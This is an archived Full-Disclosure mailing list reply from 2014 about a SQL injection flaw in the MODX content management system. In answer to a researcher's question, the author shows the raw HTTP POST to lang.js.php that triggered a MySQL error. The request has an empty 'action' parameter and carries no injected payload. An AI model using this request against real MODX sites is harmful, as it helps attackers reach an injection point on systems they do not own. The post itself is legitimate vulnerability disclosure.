[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] SQL injection in MODX

To: Peter W <pwilhelmsen@xxxxxxxxxxxxxxxx>, "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] SQL injection in MODX
From: Brandon Perry <bperry.volatile@xxxxxxxxx>
Date: Sun, 9 Mar 2014 09:22:25 -0500

  1 POST /modx/connectors/lang.js.php HTTP/1.1
  2 Host: 192.168.1.70
  3 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0)
Gecko/20100101 Firefox/26.0
  4 Accept: */*
  5 Accept-Language: en-US,en;q=0.5
  6 Accept-Encoding: gzip, deflate
  7 Referer: http://192.168.1.70/modx/manager/
  8 Cookie: PHPSESSID=v2pnqigca0qfr835vimrknh1k0
  9 Connection: keep-alive
 10 Content-Length: 64
 11
 12 ctx=mgr&topic=topmenu,file,resource,welcome,configcheck&action=

Haven't worked on it at all since the initial look through.


On Sun, Mar 9, 2014 at 5:39 AM, Peter W <pwilhelmsen@xxxxxxxxxxxxxxxx>wrote:

> Hello Brandon,
>
> Thank you for some interesting posts on the Full Disclosure mailing lists.
>
> Your analysis of the bug is very interesting and I would like to
> investigate this issue further.
>
> Could you show me what kind of requests you made to trigger the MySQL
> error?
>
> Thank for you time.
>
> Best regards, Peter
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] MODX SQLi from oss-sec
Next by Date: Re: [Full-disclosure] OT What is happening with bitcoins?
Previous by thread: Re: [Full-disclosure] MODX SQLi from oss-sec
Next by thread: Re: [Full-disclosure] Hacking in Schools
Index(es):
- Date
- Thread